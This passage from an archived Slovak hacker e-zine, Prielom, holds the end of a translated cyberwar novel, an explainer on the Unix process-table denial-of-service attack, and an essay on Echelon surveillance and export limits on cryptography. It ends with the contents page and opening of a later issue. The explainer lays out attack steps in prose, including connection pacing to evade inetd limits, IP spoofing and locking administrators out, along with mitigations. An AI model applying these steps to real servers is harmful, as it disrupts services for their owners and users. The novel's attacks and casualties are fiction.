bezpecnosti jej prikazov a riadiacich funkcii tykajucich sa ozbrojenych
sil usa. tak to je perfektne ale ako stale hovorim, prd to pomoze, ked
vsetko dalsie spadne.


meii prave poslal vsetkym americanom na inete tento obeznik: "prosime,
aby ste obmedzili pouzivanie emailu, kym nebudu mat vsetky casti krajiny
obnovenu dodavku elektrickej energie a komunikacne sluzby. zahltenie
emailami brzdi cinnost pohotovostnych agentur."



15. jul, 09:31 pdt



pfw poslala dalsie vyhlasenie (zase na vela websajtov, uplne ine od tych,
na ktore poslala svoju deklaraciu) slubovali viacej utokov, ak vlada us
a
nesplni ich poziadavky.


volal som kamosovi na fbi a zistil som, ze fedaci priznavaju (nie
verejne), ze vcerajci vypadok prudu bol utok hackerov a druha sprava
pravdepodobne nie je rozpravka. utocnik nebol citlivka - pouzil brute
force hladanie po login heslach. (kamos mi emajlol log pokusov). ale pri
sledovani povodu zdroja fedaci nasli signal v pacifiku urcujuci velkost
pristroja. mala lodka v mori, zopar sto mil od san francisca! tak predsa
to slo cez vzduch - v urcitom zmysle slova. mohli pouzit jeden zo
satelitov co vlastni nsa: preplechtili sa na vlnach nosica. to znamena ze
maju pristup na vsetky data od nsa?! nie, to by museli mat aj sifru.
vsetko je este zahmlene.


elektrina je spat uz asi sest hodin. telefon naskocil prave pred hodinou.
skusil som sa pripojit na internet ale je zapchaty premavkou.


15. jul, 10:45 pdt



konecne som sa pretlacil na web. dozvedel som sa z new york
times-sponzorovanej zap stranky, ze vladny cyberspace emergency response
team riadne zlahcoval vzniknute skody - limitovany architekturou
energickych poli, ktore boli nainstalovane napevno, pre automaticke
zdielanie vzacnych zdrojov - slabinu, ktoru vyuzili utocnici.


connie precesava analyzerom novu davku login zaznamov.


15. jul, 15:27 pdt



ap zap sajta uverejnila rozhovor s anonymnym hackerom, ktory tvrdi, ze v
case utoku bol "nahodou" v energetickych sietiach. tvrdi, ze zistil
detonaciu silnej logickej bomby, ktora prinutila systemove ovladace
opakovat ich zalozne zdielanie energie - do nekonecna. tiez tvrdi, ze sa
snazil ziskat kontrolu nad tym procesom, ked videl co sa deje ale
nepodarilo sa mu zastavit katastrofu. su to len webove kecy - avsak zhoduju
sa s tym, co uz vieme.


este sa to neskoncilo. pravdupovediac, ja si myslim, ze sa to este len
zacalo. ivars isiel do san jose po nejake pasky s backupom netu, aby z
toho mohol cosi vyzut. connie chce ostat hore celu noc a monitorovat data
premavky. ale ja si myslim, ze sa boji. vsetci sme trochu nervozni.


17. jul, 09:16 pdt



prisiel druhy utok. pocet mrtvych tiel: 463. pricina: vzdusna zrazka.
system riadenia vzusnej premavky bol cybotazovany. spravy su take, ze
zamestnanci faa sa stazovali, ze ich radarove obrazovky mrzli a ze
prehadzovali typy dat medzi blizko letiacimi lietadlami (ako napriklad
letove a vyskove data). niekolko blizkych minuti a jedna kolizia
oproti sebe letiacich lietadiel v burke nad michiganom, ktora vyustila v
smrt vsetkych cestujucich. predpoklada sa, ze automatizovany algoritmus
vyskoveho manazmentu a prevencie kolizii bol napadnuty a poskodeny.
ziadne spravy o tom, ako sa dostali dnu. niekolko zap sajtov uverejnilo
teorie, niektore celkom zaujimave.


pred hodinou usa uzemnilo vsetky komercne lety; niekolko vynimiek.
vojenske lety pokracuju, s norad a defense information systems agency
(obranne informacne systemy) "priebeh operacii" centrom v slidell,
louisiana, vyhlasili 24 hodinovu pohotovost. napriek absencii nejakej
nebezpecnej vzdusnej aktivite. a su na zlej stope, dofrasa! za
predpokladu, ze vojenske vzdusne systemy su hacknute a niektore lietadla
maju aktivnu municiu! zeby vzduch-zem rakety? ekonomicke straty su zatial
miliardy denne.


na nete narastol velkym tempom obrovsky pokrik po pomste proti pfw - ale
zamlka po mensine z kybernetickej komunity: "dostavame, co sme si
zasluzili!"


male dievcatko, ktore umrelo ked vypla elektrina pocas jej operacie v
nemocnici dostava v mediach coraz viac pozornosti.


sprava poslana do 50.000 newsgroupov od skupiny zvanej dove of jihad
(holubica z jihadu) sa prihlasila k utoku. kedze ide o pofidernu sunni
sektu (ortodoxni moslimovia), ktora je znama odmietanim akejkolvek
technologie, ich tvrdenie zverejnene pocas modlidieb v mesite v aleppo,
bolo zamietnute. rozne ine islamske skupiny sa tiez prihlasili k utoku,
popri bielej supramacistickej frakcii a andorranskom anarchistickom
syndykate. ale vsetky boli razne zamietnute, chybal im digitalny podpis,
ktory pdf mala v oboch predoslych hackoch. asi najnezvycajnejsia teoria o
identite ludi (pfw) sa objavila na jednej zap sajte, menom zap teorista.
vravi, ze vsetko toto je hollywoodske sprisahanie na generovanie filmov
po velmi komercne mizernych dvoch rokoch. fakt, ze jeden z prvych
prispevkoch deklaracie sa objavil na the hollywood reporter sajte - pred
tym, ako sa objavil na sajtoch tv kanalov - drzi svojich zastancov nad
vodou. ivars si to vsimol skor, ale nevedeli sme, co si mame o tom
mysliet.


17. jul, 16:41 pdt



dnes som poslal dalsiu spravu mckayovi s vysledkami poslednej analyzy.
vypadok prudu v energetickych sietiach zanechal taky isty otlacok ako ma
ten, ktory poslal spravy pfw na web. connie dostala genialny napad.
vravi, ze pfw zakodovala logicke bomby s ich crypto podpismi - ako sposob
dokazat, ze prisli od nich. je si ista, ze su tam a snazi sa vyzmykat
logy od fbi.


volala mi mckayova sekretarka, nech sa okamzite dostavim do moffettvho
federalneho letiska v silicon valley, aby som stihol vojensky vzdusny
transport do washingtonu. dostava ma spat z "interneho exilu" na vykon
ako jeho zamestnanca. budem sa tiez zucastnovat na mitingoch vykonnostnej
rady. v pentagone sa tvaria, ako keby moja historia s nimi sa nikdy nebola
udiala. konecne!


posledna teoria dna, majetok jednej zap sajty: islamska oslobodzovacia
armada v alzirsku sa pokusa obvinit francuzko (co vysvetluje den bastilly
na big zap) z utokov v zmysle odputat pozornost pariza od podpory
vonjnoveho zeroualskeho rezimu v alzirsku.


18. jul, 11:04 edt



pentagon. plna big zap2 pohotovost pokracuje - ale zase su blbo
sustredeni na "kriticke" alebo "minimalne dolezite" elementy, lebo to bol
strategicky pohlad pocas jadrovej ery.


dnes, na mitingu vyknonnej rady som poznamenal, ze ked v oktobri 1997
prezidentova komisia na ochranu kritickej infrastruktury zverejnila svoju
spravu o kyberterorizme, nepouzivanie silne kryptovacie sifry - a
informacia, ze stat ma pristup k kryptovacim klucom - viedla k extremnej
slabosti ochrany ameriky.


klucovy clovek v novej skupine je moj byvaly kolega a clovek, ktoreho si
naozaj velmi vazim: bob stevenson. on a ja sme boli hore dnes rano o
stvrtej a potili dokopy odhad na vyvoj obran na slabe miesta v sietovych
zdrojoch vo financnictve, energetike a dopravnych systemov. odpoved:
niekolko tyznov. a teraz mckay vravi "nestaci".


zatial pfw ohlasila 72 hodinovu "pauzu" - aby dala americkej vlade cas na
reagovanie. prezident ostava neodbytny. graf usa today ukazuje, ze
namiesto verejnej mienky "behanie okolo vlajky" ako sa predpokladalo,
podpora prezidentky obyvatelstvom totalne upada. spadla z polovice 80tich
percent do nizkych 60tich percent.


pravdaze, rastie online fikcia, ze - predvidatelne - pfw je statny trik,
spionska schema vymyslena na to, aby usa mohla vyhlasit sveobecnu vojnovu
povinnost a vytvorit policajny stat a prezidentka sa moze stat
diktatorkou - a podobne sracky.


net ostava kotlom na aktivity. zap sajty su plne pokusov "dobrych
chlapikov" hackerskych bojovnikov pokusajucich sa ziskat elektronicky
pristup na zautocene sajty a ziskat informaciu na ich sukromne patranie.
jedina vec co asi robia je este veci zmatok. ale vsak pre vela "dobrych
chlapikov", je zmatok dobra vec, vsakze. prezidentka slubila, ze vseci
"nepodareni hackeri" budi stihani za znemoznovanie vykonu moci. tiez
potvrdila, ze spojene staty sa nesklonia pred hrozbami pfw. ale
"hackerske milicie" ziskavaju aj tak popularitu.


21. jul, 01:15 edt



prestavka medzi utokmi nam dala cas na predvidanie pravdepodobnych
cielov. energeticke siete su pri plnej pohotovosti, v pripade odvetneho
zap utoku. scada systemy su takisto pod dohladom. komercne lety su stale
zrusene, takze system kontrolujuci dopravu moze byt lahko monitorovany,
ci nedoslo k napojeniu - ako ochrana proti umiestneniu "spiacich" min a
spiacich virusov, ktore by mohli byt neskor aktivovane.


financnicky sektor bol pravdepodobne na najvyssom stupni pohotovosti v
informacnom svete - trhy boli velmi nervozne. niektore zo spekulativnych
biznisov skusajuce nieco nove sa obracaju hore bruchom.


nove firmy vznikaju ako huby po dazdi. takyto spam som dostal dnes rano:
"je tvoja banka bezpecna pred teroristami? nespoliehaj sa na to - banky
su dalsie v poradi! zistime nakolko je tvoja banka zabezpecena!" potom
im das dost informacii, aby sa tam mohli vlamat oni. pekny podvod.


dnes bol vo spravach report o tom ako musel shell oil zahanbene
pripustit, ze si v panike najali zopar podvodnikov, ktori predstierali
znalosti postacujuce na zabezpecenie ich systemov pred pfw. tieto decka
(mali iba 12 rokov) by nedokazali nainstalovat ani len hru.


21. jul, 08:45 edt



horuce novinky: pocitacom kontrolovana chemicka tovaren vybuchla v
detroite. a zobrala so sebou vacsinu vychodneho detriotu. pokusame sa
ziskat viac detialov. zatial nic nove.


moje sestra zije v detroite. nemozem sa s nou spojit, linky su prerusene.
june zavolala, pytala sa ma, ci je laurie v poriadku. nemozem to zistit.
"vravela som ti..." je studena forma utechy.


21. jul, 18:18 pdt



spat v monterey. v labaku sa citim menej neschopny. pracovali sme na
stopach zo senzorov popisujucich polohu (spp), ktore spajali data zo
satelitu s datami z pozemnej stanice v usili ohranicit fyzicky bod povodu
konkretneho utoku. toto usilie bolo uspesne len z casti, kedze spp system
mohol fungovat len ked pfw pouzilo medzinarodnu telefonnu linku alebo
radiove spojenie - dokonca spp funguje rychlejsie pri radiovom spojeni.


spp analyza naznacila, ze jeden utok bol spusteny z jednej bazy v
kolumbii, dalsi z vychodneho pobrezia ciny...potom tu mame vlastnu teoriu
lode niekde za kalifornskym pobrezim. plavajuce riadiace stredisko, vzdy
v pohybe - nemozne lokalizovat, pokial nebudeme mat stastie.


ale vyzera to tak, ze mame teraz online nove programy schopne ochranit
vacsinu nasich silovych poli .... a tiez provizornu ochranu proti
mikrovlnam & empeckam.


nic nove o laurie. som znepokojeny.


22. jul, 09:09 pdt



cakam na dlhuuu analyzu, na ukoncenie spracovania posledneho vypoctu.
nemozem nic robit, iba to logovat - akokeby to bolo na nieco dobre.
washington post ma story o komisii inzinierov informatiky, ktori tvrdia,
ze maju dokazy, ze cina stoji za utokmi. suhlasili s poskytnutim dat (z
ich vlastneho internet monitorovacieho systemu) pre vladu. prvy krat,
co o
nich pocujeme. prave vysielaju rozhovor s nimi.


vzdy to bolo tam, v uzadi mojej mysle. cyber vojna. teraz je to v hlavach
coraz viac ludi. vidim to tu na skole. connie bola prestrasena nad
klavesnicou a sustavne robila preklepy ked posielala query do
vyhladavacich enginov. ivars zavolal cez videotelefon - tato budova ma
jeden - a dostal nejaky divny naval paniky. mlady, nie tak dobry v
skryvani strachu: moze toto viest k tretej svetovej vojne ?


cina vsetko popiera. predseda vlady nech-je-jeho-meno-hocijake povedal,
ze toto nie je vojna ludi. ktovie ako americania zpanikaria pri obvineni
ciny - jadrovej velmoci - za zodpovedost pre tieto utoky. uz nie iba
"velky zap". online magaziny maju pekne digitalne obrazky pocitacovych
monitorov s atomovymi hribmi...


pokracovanie v buducom cisle....


prielom(at)hysteria.sk


navrat na obsah



process table attack



process table attack alebo tiez utok cez tabulku procesov funguje takmer na
vsetkych unixovych systemoch na internete.


predstava:

process table attack je relativne novy druh denial-of-service utoku.
(teda dos - v slovencine odmietanie systemovej sluzby), co moze byt pouzite
proti viacerym sietovym sluzbam na odlisnych unixovych systemoch.
utok je urceny proti sietovym sluzbam s fork() alebo inym alokovanim noveho
procesu pre kazde prichadzajuce tcp/ip spojenie. hoci standartny unixovy
operacny sytem ma iste limity v mnozstve procesov, ktore moze hocijaky
uzivatel otvorit, nie su ziadne limity v mnozstve procesov, ktore moze
vytvorit superuzivatel. tie su limitovane len obmedzenim operacneho systemu.
prichadzajuce tcp/ip spojenie je zvycajne obsluzene serverom, ktore bezi
pod rootom, je mozne kompletne zaplnit procesovu tabulku cielovej masiny
s viacnasobnym obsahom sietovych serverov. po spravnom vykonani, tento utok
predchadza vykonaniu akehokolvek prikazu na cielovej masine.


detaily:

v knihe "bezpecnost v unixe a internete v praxi" od gene spafford je
napisane, ze unixovy operacny system originalne obsahuje niekolko defenziv
na zabezpecenie proti dos utoku. toto sa meni. s rastom internetu, bola
v poslednych rokov sustredena velka namaha na posilnenie operacneho systemu a
jeho sietovych sluzieb proti tymto utokom.
vzdy ked sietovy klient urobi spojenie na sietovy server, iste mnozstvo
prostriedkov servera sa spotrebuje. najduolezitejsie prostriedky su pozierane
pamate, diskoveho priestoru a casu prace cpu. niektore sietove sluzby,
ako sendmail monitoruju systemove prostriedky a neakceptuju prichadzajuce
sietove spojenia, ak by ich prijatie mohlo vystavit system nebezpecenstvu.


existuje jeden systemovy prostriedok, kde je prerusene monitorovanie mnozstva
procesov, ktore bezia na pocitaci. vacsina verzii unixu povoluje len iste
mnozstvo procesov, ktore muozu byt spustene sucasne. kazdy proces zaberie
slot v systemovej procesovej tabulke. vyplneniu tejto tabulky, je mozne
predchadzat, aby operacny system stale nevytvaral nove procesy, aj napriek
ostatnym prostriedkom ako pamat, diskovy priestor a cas prace cpu siroko
pristupnych.


implementacia mnozstva sietovych sluzieb nechava otvorenu cestu process table
attacku. to je utok, kedy utocnik vyplni cielovu systemovu procesovu
tabulku, kedy nemuozu byt vykonane ziadne nove programy. dizajn niektorych
sietovych protokolov prave vedie programatorov k robeniu tychto chyb.


priklad takehoto protokolu je finger protokol (tcp port 79), ktory pracuje
podla nasledujucej schemy:


1. klient urobi spojenie na server
2. server prijme spojenie a vytvori process na obsluhu ziadosti
3. klient posle jednoduchy riadok na server obsahujuci meno entity, ktore
si klient zela vyfingerovat
4. server prevedie potrebny nahlad do databazy a posle informaciu naspat
klientovi
5. server ukonci spojenie


na spustenie process table attacku, klient potrebuje otvorit len spojenie
na server a neposlat ziadnu informaciu. tak ako dlho klient drzi spojenie
otvorenu, tak dlho proces okupuje serveru slot v serverovej systemovej tabulke.
na vacsine pocitacoch, finger je nastartovany cez inetd. autori inetd
umiestnili viacero kontrol v zdrojovom kode programu, ktore musia byt
zrusene na to, aby mohla nastat uspesna inicializacia procesoveho utoku.
ak inetd prijme viac ako 40 spojeni v patricnej sluzbe pod 1 minutu,
sluzba sa vypne na 10 minut. ciel tychto kontrol nebol zabezpecit server
proti process table attacku, ale zabezpecit ho proti chybovemu kodu, ktory
moze vytvorit viacero spojeni v rapidne-rychlej sekvencii.


na spustenie uspesneho process table attacku proti pocitacu na ktorom bezi
inetd a finger musi byt vykonany nasledujuci postup:


1. otvorenie spojenia na cielovy finger port
2. pockat zhruba 4 sekundy
3. opakovat stale 1 a 2 krok


zostrojit utocny program sa neobide bez technickych problemov. vela systemov
limituje mnozstvo tcp spojeni, ktore muozu byt inicializovane jednym procesom.
proti tomu, je potrebne spustit utok z viacerych procesov, mozno pustenim
z viacerych pocitacov.


bolo otestovanych viacero sietovych sluzieb na viacerych operacnych
systemoch. uw imapove a sendmailove servery su pravdepodobne tiez
zranitelne. uw imap neobsahuje kontrolu pre rapidne rychle spojenia.
preto je mozne shutdownut pocitac otvorenim viacerych spojeni na imap
server v kratkom casovom rozpati. so sendmailom je situacia obratena.
normalne, sendmail neprijme spojenia pokym systemove zatazenie nepresiahne
isty predefinovany stupen. preto na inicializaciu uspesneho sendmailoveho utoku
je potrebne otvorit spojenie velmi pomaly, tak ze tabulka procesov sa bude
zvacsovat postupne pricom zatazenie systemu zostane viacmenej konstatne.
vela problemov je v bsd masinach pouzivanych utocnikom. ked cielova masina
zamrzne alebo padne, utocnikova masina niekedy padne tiez. zjavne tcp
zasobnik nedokaze dobre obsluzit stovky spojeni na rovnaky port rovnakej
masiny simultanne s prechodom do fin_wait_2 stavu.


je viacero variantov tohot utoku:


1. pouzijeme ip spoofing, kedy prichadzajuce spojenie prichadza alebo sa
skuor zjavuje z nahodnych oblasti internetu. umoznuje to dostatocne tazsie
hladanie.
2. zacneme utok poslanim 50 ziadosti v rychlom casovom slede na telnet,
rlogin a rsh porty na cielovu masinu. zapricini to, ze inetd zhodi tieto
sluzby na cielovej masine, co zablokuje administratorov pristup pocas utoku.
3. namiesto inicializovania noveho spojenia kazde 4 sekundy, inicializujeme
jedno kazdu minutu alebo tak nejako. utok pomaly rastie, ovela tazsie sa
detekuju stopy paketov.


existuje viacero spuosobov na zabranenie utoku:


1. inetd a ine programy by mali kontrolovat mnozstvo volnych slotov v
procesovej tabulke pred prijatim noveho spojenia. ak je mensie ako ista
predefinovana hodnota volnych slotov, nove spojenia nebudu akceptovane.
2. alternativne, ak je viac ako iste mnozstvo sietovych daemonov pre prave
prebiehajucu sluzbu, prichadzajuce ziadosti by mali byt radsej zoradovane (s
neskorsim vykonanim) ako hned obsluhovane.
3. sietove sluzby (ako finger) by mali mat implementovany time-out.
napriklad prikaz alarm by mal byt vlozeny do zdrojoveho kodu finger daemona,
takze program sa zastavi po 30 sekundach behu.


wilder, wilder(at)hq.alert.sk


navrat na obsah



echelon, globalny monitorovaci system



"pani telefonuje so svojou priatelkou o hre, ktoru hra jej syn. popisuje
ju a pritom pouzije slovo bomba. v tom momente sa tento odposluch zvyraznil a
na papier sa v priebehu niekolkych dni dostal zaznam celeho hovoru. tento
papier sa o jeden alebo dva dni od odchytenia telefonatu dostal analyzatorovi
CSE, ktory to nechcel len tak zahodit, pretoze nemohol vediet, ci o tom hovore
vie dost. telefonne cislo spolu s menom, ktore sa k nemu viazalo bolo zaradene
do databazy CSE ako mozny terorista."


sci-fi, poviete si. vymysel konspiracneho teoretika, ktory chce ziskat slavu.
donedavna si to myslelo vela ludi, ked byvaly spion kanadskej CSE rozpraval
tento pribeh, aby upozornil na medzinarodny spionazny system vybudovany ako
sucast dohody UKUSA. este ste o nom nepoculi ? echelon -- system obrovskych
kolektorov odchytenych dat spolu so slovnikom a vyhladavacim systemom. donedavna
to mozno mohlo vyzerat ako konspiracna teoria. az kym vlada australie verejne
nepriznala ucast v spionaznej sieti pod hlavickou UKUSA. Udajne tak urobili, aby
obcania australie ziskali istotu, ze na nich je odpocuvanie regulovane.


v liste martina bradyho, riaditela australskeho DSD (defence signals
directorate), reporterovi programu sunday televiznej stanice channel 9 rossovi
coulthartovi vysvetluje: "pravidla poskytuju mechanizmy, ktore dovolia DSD
monitorovat a oznamit zahranicne komunikacie, ktore sa vztahuju k australcanom v
istych specialnych presne definovanych pripadoch ako napr. komunikacie
seriozneho kriminalneho zivla, ohrozenie zivota alebo bezpecnosti australcana,
pripadne ak australcan pracuje ako agent cudzej mocnosti. na taketo odpocuvanie
a vypustenie takejto informacie je potrebne specialne povolenie."


dohoda UKUSA bola podpisana pravdepodobne v roku 1942 alebo 1943. signatarmi
tejto dohody su usa, velka britania, kanada, australia a novy zeland. aj ked
australska vlada priznala, ze takyto pakt existuje, je okolo neho este mnozstvo
otaznikov. vsetky dokumenty, ktore sa co i len dotykaju tejto dohody, su prisne
tajne. americka NSA sa doteraz snazila popriet co i len existenciu tohto
systemu. tu vsak uz niektore krajiny z UKUSA potvrdili.


coho sa teda bat? uz dlhsiu dobu existuju podozrenia, ze tento spionazny
system sa nevyuziva len na politicku a protiteroristicku spionaz.
"s koncom studenej vojny je novou spionaznou hrou komercna spionaz",
hovori reporter channel 9 ross coulthart. system echelon vyuziva najma usa na
ziskanie komercnych vyhod pre svoje sukromne firmy. pomoc podla viacerych
zdrojov dostali velke medzistatne kontrakty, v ktorych figurovali mena
ako japonsky nec a francuzsky airbus industrie na strane porazenych a
americke firmy boeing, mcdonnel-douglas a at&t na strane vitazov. to, ci su
tieto spekulacie pravdive sa asi este par rokov nedozvieme. wayne madsen
hovori: "ekonomicka spionaz je teraz kralom. je to priorita cislo jeden."


"hovorim, nikdy nepodcenujte kapacitu systemu ako je echelon. nikdy
nepodcenujte silu, ktoru tieto organizacie maju na zneuzitie systemu ako
echelon. nemyslite si, ze sa to nemoze stat v australii. nemyslite si,
ze sa to nemoze stat v kanade, pretoze sa to stava."
, hovori frost. a
madsene dodava: "krajiny uz nemaju spojencov -- maju len zaujmy."
echelon je system, ktory vyhladava na zaklade klucovych slov a dokaze
rozoznat aj hlasy ludi. kriteria pre vyhladavanie mozu zadavat vsetky
krajiny z UKUSA a teda napriklad americka NSA moze dostat informacie,
ktore odchytila spionazna stanica vo whailopai (novy zeland). toto vyzera
zaujimavo, az na jeden maly detail. "pri mnozstve veci, ktore sme robili
pre americanov sme nevedeli, aku prevadzku sme monitorovali. poziadali
nas, aby sme zozbierali veci v sirokopasmovom rezime, inymi slovami, aby
sme tam isli a jednoducho zaznamenali siroke frekvencne pasmo a potom
aby sme poslali vsetko do centraly NSA, takze sme nevedeli, co sme
nahravali, pretoze nam dali zariadenie len na nahravanie, ale nikdy nam
nedali zariadenia na demodulaciu a demultiplexovanie."


toto je pravdepodobne aj problem australie, pretoze ta casto nevie, co
nahrava, pretoze posiela cisty, nerozlozeny prud dat priamo do NSA. v
takomto pripade sa spominane pravidla DSD dodrzovat jednoducho nedaju.
a zaujimave je, ze australia mozno je spojencom usa v politickej sfere,
ale v ekonomickej si samozrejme konkuruju.


a co sukromna spionaz? mate mat strach aj ako osoby? mike frost hovori,
ze dostal prikaz odpocuvat mobilny telefon margaret turdeau, manzelky
vtedajsieho kanadskeho premiera pierreho turdeaua. "... jednoducho som
sa necitil dobre sediac v kancelarii v CSE s nejakymi sluchatkami na usiach
a snaziac sa odchytit konverzaciu manzelky premiera. vadilo mi to, nie
vsak do takej miery, ze by som isiel za mojim sefom a povedal nie, nespravim
to
. vadilo mi to do tej miery, ze som sa mozno nesnazil az tak, ako by som
sa mohol. lebo si myslim, ze tam hlboko v mojom vnutri som jednoducho nechcel
pocuvat."


nerobme vsak zo signatarov UKUSA tych najhorsich zo vsetkych. podobne
spionazne systemy si buduje vraj aj francuzsko (s vydatnou pomocou svojich
malych ostrovcekov) a pozadu pravdepodobne nebude ani rusko. francuzsko vsak
ma jednu vyhodu -- podarilo sa im to lepsie utajit. zaujimavy je teda pohlad
na tuto problematiku z trosku ineho hladiska. pozrime sa na zakony krajin,
ktore si spominame a vztah tychto zakonov ku kryptografii, ktora jedina
moze ucinne ochranit vase sukromie pred spionaznymi systemami. donedavna bolo
azda najhorsim prikladom francuzsko, kde bola kryptografia uplne zakazana. to
sa vsak uz zmenilo k lepsiemu, pretoze kryptografia je velmi potrebna aj v
inych odvetviach priemyslu -- hlavne vo financnictve a bankovnictve.
v usa zvolili inu taktiku. svojim firmam kryptografiu povoluju, ale export
akejkolvek sifrovacej technologie za hranice statu zakazuju. kabinet billa
clintona zaznamenal velky uspech aj podpisanim wassenaarskej dohody mnohymi
krajinami, (vratane slovenskej republiky, ceskej republiky, velkej britanie a
australie) ktora v prvotnej verzii uplne zakazovala export kryptografie okrem
digitalnych podpisov. nova verzia dovoluje export volne dostupneho softveru,
nad cim sa uz mnohym zastavuje rozum uplne, pretoze prave volne dostupny
sifrovaci softver je najkvalitnejsi (je overeny casom a ocami mnohych
expertov). wassenaarska dohoda vsak nie je zakonom, samotny export sa
musi upravit legislativne vo vnutri krajiny. niektore krajiny maju podla
istych zdrojov tendenciu prijat zakon zakazujuci export kryptografie a
ako zamienku maju pouzit prave wassenaarsku dohodu. tieto informacie su
vsak maximalne nepotvrdene a ich pravdivost ukaze az cas.


zaujimavy je pripad nemeckej spolkovej republiky. vlada nsr totiz dostala
list od janet reno, v ktorom ziadala nemecku vladu o zavedenie podobnych
zakonov na export, ake ma usa. o neuspechu tohto listu sa mozeme presvedcit
tym, ze vlada nsr zacala nemalymi ciastkami dotovat vyvoj gnu privacy guard
a inych systemov, ktore maju zabezpecit silne sifrovanie. svoje rozhodnutie
zdovodnuju tym, ze teroristi pristup k silnej kryptografii uz davno maju
(da sa stiahnut volne na internete) a ze taketo obmedzenie by malo vyznamny
dopad len na sukromie bezuhonnych obcanov. vivat germany! po prestudovani
niektorych primitivnych zakonov usa sa vazne zastavuje zdravy rozum -- a usa
uz velmi dlho nepovazujem za to, co mnoho inych ludi -- za slobodnu krajinu.


z hladiska vseobecnej politky je velmi zaujimave, ze prave australia je
vacsinou prestupnou krajinou, kde sa robia casti informacnych systemov
americkych firiem, ktore vyzaduju kryptografiu (ak sa tieto casti spravia
v australii, prakticky sa obidu exportne obmedzenia, pretoze exportovat
sa bude z australie, ktora ma export povoleny a dane za predaj samozrejme
poputuju aj do australskej statnej pokladnice). medzi taketo prestupne
krajiny patri napriklad aj island a izrael. izrael a island kvoli tomuto
nepodpisali ani wassenaarsku dohodu.


tak si teda povedzme, ake su moznosti spionaznych agentur. mozno ste videli
film enemy of the state, kde sa prejednavala presne tato tema. tak si zoberme
vas den. rano sa zobudite, zapnete si mobilny telefon (v tomto momente
sa niekde zaznamenalo, ze ste ho zapli a zapisala sa vasa aktualna poloha).
len co vytrcite paty z domu, pomocou suradnic ziskanych lokalizaciou vaseho
telefonu sa na vas namieri obrovsky spionazny satelit, ktory sleduje
kazdy vas krok. dobre, vypnime mobilny telefon a podme na obed, kde zaplatime
kreditnou kartou. to sa samozrejme oznami tiez (s informaciou kde ste co a
za kolko kupovali). a to sme sa este nepripojili na internet. ja osobne sa
na internete citim relativne najbezpecnejsie, lebo som schopny sifrovat
prenos. ale treba si uvedomit, ze niekedy nie je ani take dolezite o com
sa rozpravate, ale s kym sa rozpravate.


vieme, ze za byvalej vlady isli obrovske peniaze do SISky. to, ze SIS je
schopna odpocuvat mobilne telefony (co dokaze kvoli slabemu sifrovaniu v gsm
kazdy lepsi technik a nmt kazde male dieta s radiom). vieme aj to, ze SIS
ma tzv. tempestove auticka (to je taka modra dodavka s ufom na kapote, ktora
je mimo ine schopna odchytavat obraz z monitora pomocou elektromagnetickeho
ziarenia). od prislusnikov podsvetia som sa dozvedel, ze SIS disponuje dokonca
zariadenim na lokalizaciu hovorov podla hlasu. o tom osobne dost pochybujem,
ale mozne to je (aspon co sa tyka urciteho okruhu, predpokladam, ze analyzovat
obrovsku skalu hovorov asi nasa spionazna agentura nedokaze). NSA ide vsak
dalej. maju obrovske stroje urcene len na desifrovanie slabsich sifier.
maju patent na vyhladavanie dolezitych informacii v spleti dat.
maju zdroje na odpocuvanie komunikacie a satelitnu spionaz...
co ma vsak zaraza najviac je, ze ludia to vedia a nic proti tomu nerobia.


este snad nejake url (s fotkami spionaznych satelitov a pozemnych komunikacnych
anten).
echelon watch je stranka
zamerana cisto na echelon. federation of
american scientists
berie spionaz z trosku sirsieho hladiska. no a samozrejme
gnu privacy guard je program, ktory vam
pomoze velmi silno zasifrovat akekolvek data (aj ked je zamerany na sifrovanie
mailov).


do 21. storocia teda dufam uz nepojdeme s nabitymi zbranami. namiesto toho
su na nas nasmerovane obrovske spionazne satelity a anteny. pravdepodobne
uz nebudeme bojovat zbranami, ale ekonomickou silou a informovanostou.
ved nie nadarmo sa hovori, ze vo svete ma najvacsiu cenu prave informacia...


juraj bednar, bednar(at)rak.isternet.sk


navrat na obsah



generator nahodnych cisiel



nas vyskumny tim prisiel k prevratnym zaverom, ktore zmenia vas pohlad na
sucasny svet, spolocnost a hlavne konkretnych jedincov. tato teoria sa tyka
kazdeho z vas. omyl, nie teoria. tato teoria je realitou.

(kraliky, vakcina, susienky. co to ma vsetko znamenat?! ...pozn. puf)



na zaklade mnohych pokusov a pozorovani sme dospeli k nasledujucim vysledkom:


00000001000001020061730200619259
pajkus
 pajkus      03.03.2004 - 13:33:34 , level: 1, UP   NEW



::::::::::. :::::::.. :::.,:::::: ::: ... . :
`;;;```.;;;;;;;``;;;; ;;;;;;;'''' ;;; .;;;;;;;. ;;,. ;;;
`]]nnn]]' [[[,/[[[' [[[ [[cccc [[[ ,[[ [[,[[[[, ,[[[[,
$$$"" $$$$$$c $$$ $$"""" $$' $$$, $$$$$$$$$$$"$$$
888o 888b "88bo,888 888oo,__ o88oo,.__"888,_ _,88P888 Y88" 888o
YMMMb MMMM "W" MMM """"YUMMM""""YUMMM "YMMMMMP" MMM M' "MMM

prielom #12, 27.7.99 , prielom(at)hysteria.sk, http://hysteria.sk/prielom/




obsah



konfiguracne backdoory

kreditne karty

valka elektronickych gangu III.

redir hry s arp a icmp

morris internet worm

koniec sveta

re: pro pana dastycha







intro



kedze prielom teraz vychadza pomerne sporadicky, zmenil som trochu typ uverejnovanych
clankov. namiesto kratkych security news a pokecnych clanockov som sem dal dlhsie
veci, ktore boli podrobnejsie pripravovane, a taktiez dlhsie preklady zahranicnych
veci. jeden z dovodov je ze na kratsie newsove clanky je tu teraz skvely
http://underground.cz/, no a hadam tym aj trochu stupla kvalita prielomu.



v tomto cisle prielomu je dokoncenie prekladu "valka elektronickych gangu". kedze to
malo vcelku uspech, rozhodol som sa prekladat dalsie podobne veci z folkloru. zacal
som prekladat aj uryvok zo skvelej knizky The Great Cyberwar of 2002, co je taka
fikcia o vojnovom konflikte zaciatkom buduceho storocia, ktoreho dominantna cast sa
odohrava prave na elektronickom fronte.



pridal som sem aj clanok o morrisovom worme, ktory prebehol inetom pred desiatimi
rokmi a o ktorom sa odvtedy dost pisalo, ale cmarali o nom novinari a vacsinou z toho
vznikali bulvarne pokecy stravitelne beznou poulicnou zmesou. v tomto clanku su
uvedene technicke fakty. je tu tiez sucho-technicky clanok o spoofovani arp adries a
icmp vyvazeny komickou poviedkou "koniec sveta" a klasickym interview s dastychom.


ehm, nech sa paci :)


pajka, 25.7.99 blava




konfiguracne backdoory



v dnesnej dobe existuje fura krasne prerobenych systemovych programov, ktore sluzia ako
backdoory. obcas je to len par riadkov kodu pridanych do /bin/login, inokedy su to riadne
